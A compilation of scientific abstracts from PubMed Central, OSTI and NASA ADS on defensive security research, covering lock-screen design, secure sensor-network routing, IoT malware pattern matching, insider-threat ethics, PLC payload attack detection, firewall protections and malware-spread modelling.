Among the various smart multimedia devices, multimedia smartphones have become the most widespread due to their convenient portability and real-time information sharing, as well as various other built-in features. Accordingly, since personal and business activities can be carried out using multimedia smartphones without restrictions based on time and location, people have more leisure time and convenience than ever. However, problems such as loss, theft, and information leakage because of convenient portability have also increased proportionally. As a result, most multimedia smartphones are equipped with various built-in locking features. Pattern lock, personal identification numbers, and passwords are the most used locking features on current smartphones, but these are vulnerable to shoulder surfing and smudge attacks, allowing malicious users to bypass the security feature easily. In particular, the smudge attack technique is a convenient way to unlock multimedia smartphones after they have been stolen. In this paper, we propose the secure locking screen using time pattern (SLSTP) focusing on improved security and convenience for users to support human-centric multimedia device completely. The SLSTP can provide a simple interface to users and reduce the risk factors pertaining to security leakage to malicious third parties.

FuGeF: A Resource Bound Secure Forwarding Protocol for Wireless Sensor Networks

PubMed Central

Umar, Idris Abubakar; Mohd Hanapi, Zurina; Sali, A.; Zulkarnain, Zuriati A.

2016-01-01

Resource bound security solutions have facilitated the mitigation of spatio-temporal attacks by altering protocol semantics to provide minimal security while maintaining an acceptable level of performance. The Dynamic Window Secured Implicit Geographic Forwarding (DWSIGF) routing protocol for Wireless Sensor Network (WSN) has been proposed to achieve a minimal selection of malicious nodes by introducing a dynamic collection window period to the protocol’s semantics. However, its selection scheme suffers substantial packet losses due to the utilization of a single distance based parameter for node selection. In this paper, we propose a Fuzzy-based Geographic Forwarding protocol (FuGeF) to minimize packet loss, while maintaining performance. The FuGeF utilizes a new form of dynamism and introduces three selection parameters: remaining energy, connectivity cost, and progressive distance, as well as a Fuzzy Logic System (FLS) for node selection. These introduced mechanisms ensure the appropriate selection of a non-malicious node. Extensive simulation experiments have been conducted to evaluate the performance of the proposed FuGeF protocol as compared to DWSIGF variants. The simulation results show that the proposed FuGeF outperforms the two DWSIGF variants (DWSIGF-P and DWSIGF-R) in terms of packet delivery. PMID:27338411

A Malicious Pattern Detection Engine for Embedded Security Systems in the Internet of Things

PubMed Central

Oh, Doohwan; Kim, Deokho; Ro, Won Woo

2014-01-01

With the emergence of the Internet of Things (IoT), a large number of physical objects in daily life have been aggressively connected to the Internet. As the number of objects connected to networks increases, the security systems face a critical challenge due to the global connectivity and accessibility of the IoT. However, it is difficult to adapt traditional security systems to the objects in the IoT, because of their limited computing power and memory size. In light of this, we present a lightweight security system that uses a novel malicious pattern-matching engine. We limit the memory usage of the proposed system in order to make it work on resource-constrained devices. To mitigate performance degradation due to limitations of computation power and memory, we propose two novel techniques, auxiliary shifting and early decision. Through both techniques, we can efficiently reduce the number of matching operations on resource-constrained systems. Experiments and performance analyses show that our proposed system achieves a maximum speedup of 2.14 with an IoT object and provides scalable performance for a large number of patterns. PMID:25521382

Social/Ethical Issues in Predictive Insider Threat Monitoring

DOE Office of Scientific and Technical Information (OSTI.GOV)

Greitzer, Frank L.; Frincke, Deborah A.; Zabriskie, Mariah

2011-01-01

Combining traditionally monitored cybersecurity data with other kinds of organizational data is one option for inferring the motivations of individuals, which may in turn allow early prediction and mitigation of insider threats. While unproven, some researchers believe that this combination of data may yield better results than either cybersecurity or organizational data would in isolation. However, this nontraditional approach creates a potential conflict between goals, such as conflicts between organizational security improvements and individual privacy considerations. There are many facets to debate. Should warning signs of a potential malicious insider be addressed before a malicious event has occurred to preventmore » harm to the organization and discourage the insider from violating the organization’s rules? Would intervention violate employee trust or legal guidelines? What about the possibilities of misuse? Predictive approaches cannot be validated a priori; false accusations can affect the career of the accused; and collection/monitoring of certain types of data may affect employee morale. In this chapter, we explore some of the social and ethical issues stemming from predictive insider threat monitoring and discuss ways that a predictive modeling approach brings to the forefront social and ethical issues that should be considered and resolved by stakeholders and communities of interest.« less

Understanding the Value of a Computer Emergency Response Capability for Nuclear Security

DOE Office of Scientific and Technical Information (OSTI.GOV)

Gasper, Peter Donald; Rodriguez, Julio Gallardo

The international nuclear community has a great understanding of the physical security needs relating to the prevention, detection, and response of malicious acts associated with nuclear facilities and radioactive material. International Atomic Energy Agency (IAEA) Nuclear Security Recommendations (INFCIRC_225_Rev 5) outlines specific guidelines and recommendations for implementing and maintaining an organization’s nuclear security posture. An important element for inclusion into supporting revision 5 is the establishment of a “Cyber Emergency Response Team (CERT)” focused on the international communities cybersecurity needs to maintain a comprehensive nuclear security posture. Cybersecurity and the importance of nuclear cybersecurity require that there be a specificmore » focus on developing an International Nuclear CERT (NS-CERT). States establishing contingency plans should have an understanding of the cyber threat landscape and the potential impacts to systems in place to protect and mitigate malicious activities. This paper will outline the necessary components, discuss the relationships needed within the international community, and outline a process by which the NS-CERT identifies, collects, processes, and reports critical information in order to establish situational awareness (SA) and support decision-making« less

Novel Duplicate Address Detection with Hash Function

PubMed Central

Song, GuangJia; Ji, ZhenZhou

2016-01-01

Duplicate address detection (DAD) is an important component of the address resolution protocol (ARP) and the neighbor discovery protocol (NDP). DAD determines whether an IP address is in conflict with other nodes. In traditional DAD, the target address to be detected is broadcast through the network, which provides convenience for malicious nodes to attack. A malicious node can send a spoofing reply to prevent the address configuration of a normal node, and thus, a denial-of-service attack is launched. This study proposes a hash method to hide the target address in DAD, which prevents an attack node from launching destination attacks. If the address of a normal node is identical to the detection address, then its hash value should be the same as the “Hash_64” field in the neighboring solicitation message. Consequently, DAD can be successfully completed. This process is called DAD-h. Simulation results indicate that address configuration using DAD-h has a considerably higher success rate when under attack compared with traditional DAD. Comparative analysis shows that DAD-h does not require third-party devices and considerable computing resources; it also provides a lightweight security resolution. PMID:26991901

Deviation-based spam-filtering method via stochastic approach

NASA Astrophysics Data System (ADS)

Lee, Daekyung; Lee, Mi Jin; Kim, Beom Jun

2018-03-01

In the presence of a huge number of possible purchase choices, ranks or ratings of items by others often play very important roles for a buyer to make a final purchase decision. Perfectly objective rating is an impossible task to achieve, and we often use an average rating built on how previous buyers estimated the quality of the product. The problem of using a simple average rating is that it can easily be polluted by careless users whose evaluation of products cannot be trusted, and by malicious spammers who try to bias the rating result on purpose. In this letter we suggest how trustworthiness of individual users can be systematically and quantitatively reflected to build a more reliable rating system. We compute the suitably defined reliability of each user based on the user's rating pattern for all products she evaluated. We call our proposed method as the deviation-based ranking, since the statistical significance of each user's rating pattern with respect to the average rating pattern is the key ingredient. We find that our deviation-based ranking method outperforms existing methods in filtering out careless random evaluators as well as malicious spammers.

FuGeF: A Resource Bound Secure Forwarding Protocol for Wireless Sensor Networks.

PubMed

Umar, Idris Abubakar; Mohd Hanapi, Zurina; Sali, A; Zulkarnain, Zuriati A

2016-06-22

Resource bound security solutions have facilitated the mitigation of spatio-temporal attacks by altering protocol semantics to provide minimal security while maintaining an acceptable level of performance. The Dynamic Window Secured Implicit Geographic Forwarding (DWSIGF) routing protocol for Wireless Sensor Network (WSN) has been proposed to achieve a minimal selection of malicious nodes by introducing a dynamic collection window period to the protocol's semantics. However, its selection scheme suffers substantial packet losses due to the utilization of a single distance based parameter for node selection. In this paper, we propose a Fuzzy-based Geographic Forwarding protocol (FuGeF) to minimize packet loss, while maintaining performance. The FuGeF utilizes a new form of dynamism and introduces three selection parameters: remaining energy, connectivity cost, and progressive distance, as well as a Fuzzy Logic System (FLS) for node selection. These introduced mechanisms ensure the appropriate selection of a non-malicious node. Extensive simulation experiments have been conducted to evaluate the performance of the proposed FuGeF protocol as compared to DWSIGF variants. The simulation results show that the proposed FuGeF outperforms the two DWSIGF variants (DWSIGF-P and DWSIGF-R) in terms of packet delivery.

Detecting Payload Attacks on Programmable Logic Controllers (PLCs)

DOE Office of Scientific and Technical Information (OSTI.GOV)

Yang, Huan

Programmable logic controllers (PLCs) play critical roles in industrial control systems (ICS). Providing hardware peripherals and firmware support for control programs (i.e., a PLC’s “payload”) written in languages such as ladder logic, PLCs directly receive sensor readings and control ICS physical processes. An attacker with access to PLC development software (e.g., by compromising an engineering workstation) can modify the payload program and cause severe physical damages to the ICS. To protect critical ICS infrastructure, we propose to model runtime behaviors of legitimate PLC payload program and use runtime behavior monitoring in PLC firmware to detect payload attacks. By monitoring themore » I/O access patterns, network access patterns, as well as payload program timing characteristics, our proposed firmware-level detection mechanism can detect abnormal runtime behaviors of malicious PLC payload. Using our proof-of-concept implementation, we evaluate the memory and execution time overhead of implementing our proposed method and find that it is feasible to incorporate our method into existing PLC firmware. In addition, our evaluation results show that a wide variety of payload attacks can be effectively detected by our proposed approach. The proposed firmware-level payload attack detection scheme complements existing bumpin- the-wire solutions (e.g., external temporal-logic-based model checkers) in that it can detect payload attacks that violate realtime requirements of ICS operations and does not require any additional apparatus.« less

Authorship attribution of source code by using back propagation neural network based on particle swarm optimization

PubMed Central

Xu, Guoai; Li, Qi; Guo, Yanhui; Zhang, Miao

2017-01-01

Authorship attribution is to identify the most likely author of a given sample among a set of candidate known authors. It can be not only applied to discover the original author of plain text, such as novels, blogs, emails, posts etc., but also used to identify source code programmers. Authorship attribution of source code is required in diverse applications, ranging from malicious code tracking to solving authorship dispute or software plagiarism detection. This paper aims to propose a new method to identify the programmer of Java source code samples with a higher accuracy. To this end, it first introduces back propagation (BP) neural network based on particle swarm optimization (PSO) into authorship attribution of source code. It begins by computing a set of defined feature metrics, including lexical and layout metrics, structure and syntax metrics, totally 19 dimensions. Then these metrics are input to neural network for supervised learning, the weights of which are output by PSO and BP hybrid algorithm. The effectiveness of the proposed method is evaluated on a collected dataset with 3,022 Java files belong to 40 authors. Experiment results show that the proposed method achieves 91.060% accuracy. And a comparison with previous work on authorship attribution of source code for Java language illustrates that this proposed method outperforms others overall, also with an acceptable overhead. PMID:29095934

Real time biometric surveillance with gait recognition

NASA Astrophysics Data System (ADS)

Mohapatra, Subasish; Swain, Anisha; Das, Manaswini; Mohanty, Subhadarshini

2018-04-01

Bio metric surveillance has become indispensable for every system in the recent years. The contribution of bio metric authentication, identification, and screening purposes are widely used in various domains for preventing unauthorized access. A large amount of data needs to be updated, segregated and safeguarded from malicious software and misuse. Bio metrics is the intrinsic characteristics of each individual. Recently fingerprints, iris, passwords, unique keys, and cards are commonly used for authentication purposes. These methods have various issues related to security and confidentiality. These systems are not yet automated to provide the safety and security. The gait recognition system is the alternative for overcoming the drawbacks of the recent bio metric based authentication systems. Gait recognition is newer as it hasn't been implemented in the real-world scenario so far. This is an un-intrusive system that requires no knowledge or co-operation of the subject. Gait is a unique behavioral characteristic of every human being which is hard to imitate. The walking style of an individual teamed with the orientation of joints in the skeletal structure and inclinations between them imparts the unique characteristic. A person can alter one's own external appearance but not skeletal structure. These are real-time, automatic systems that can even process low-resolution images and video frames. In this paper, we have proposed a gait recognition system and compared the performance with conventional bio metric identification systems.

Develop a solution for protecting and securing enterprise networks from malicious attacks

NASA Astrophysics Data System (ADS)

Kamuru, Harshitha; Nijim, Mais

2014-05-01

In the world of computer and network security, there are myriad ways to launch an attack, which, from the perspective of a network, can usually be defined as "traffic that has huge malicious intent." Firewall acts as one of the measure in order to secure the device from incoming unauthorized data. There are infinite number of computer attacks that no firewall can prevent, such as those executed locally on the machine by a malicious user. From the network's perspective, there are numerous types of attack. All the attacks that degrade the effectiveness of data can be grouped into two types: brute force and precision. The Firewall that belongs to Juniper has the capability to protect against both types of attack. Denial of Service (DoS) attacks are one of the most well-known network security threats under brute force attacks, which is largely due to the high-profile way in which they can affect networks. Over the years, some of the largest, most respected Internet sites have been effectively taken offline by Denial of Service (DOS) attacks. A DoS attack typically has a singular focus, namely, to cause the services running on a particular host or network to become unavailable. Some DoS attacks exploit vulnerabilities in an operating system and cause it to crash, such as the infamous Win nuke attack. Others submerge a network or device with traffic so that there are no more resources to handle legitimate traffic. Precision attacks typically involve multiple phases and often involves a bit more thought than brute force attacks, all the way from reconnaissance to machine ownership. Before a precision attack is launched, information about the victim needs to be gathered. This information gathering typically takes the form of various types of scans to determine available hosts, networks, and ports. The hosts available on a network can be determined by ping sweeps. The available ports on a machine can be located by port scans. Screens cover a wide variety of attack traffic as they are configured on a per-zone basis. Depending on the type of screen being configured, there may be additional settings beyond simply blocking the traffic. Attack prevention is also a native function of any firewall. Juniper Firewall handles traffic on a per-flow basis. We can use flows or sessions as a way to determine whether traffic attempting to traverse the firewall is legitimate. We control the state-checking components resident in Juniper Firewall by configuring "flow" settings. These settings allow you to configure state checking for various conditions on the device. You can use flow settings to protect against TCP hijacking, and to generally ensure that the fire-wall is performing full state processing when desired. We take a case study of attack on a network and perform study of the detection of the malicious packets on a Net screen Firewall. A new solution for securing enterprise networks will be developed here.

Statistics-based email communication security behavior recognition

NASA Astrophysics Data System (ADS)

Yi, Junkai; Su, Yueyang; Zhao, Xianghui

2017-08-01

With the development of information technology, e-mail has become a popular communication medium. It has great significant to determine the relationship between the two sides of the communication. Firstly, this paper analysed and processed the content and attachment of e-mail using the skill of steganalysis and malware analysis. And it also conducts the following feature extracting and behaviour model establishing which based on Naive Bayesian theory. Then a behaviour analysis method was employed to calculate and evaluate the communication security. Finally, some experiments about the accuracy of the behavioural relationship of communication identifying has been carried out. The result shows that this method has a great effects and correctness as eighty-four percent.

Nodal infection in Markovian susceptible-infected-susceptible and susceptible-infected-removed epidemics on networks are non-negatively correlated

NASA Astrophysics Data System (ADS)

Cator, E.; Van Mieghem, P.

2014-05-01

By invoking the famous Fortuin, Kasteleyn, and Ginibre (FKG) inequality, we prove the conjecture that the correlation of infection at the same time between any pair of nodes in a network cannot be negative for (exact) Markovian susceptible-infected-susceptible (SIS) and susceptible-infected-removed (SIR) epidemics on networks. The truth of the conjecture establishes that the N-intertwined mean-field approximation (NIMFA) upper bounds the infection probability in any graph so that network design based on NIMFA always leads to safe protections against malware spread. However, when the infection or/and curing are not Poisson processes, the infection correlation between two nodes can be negative.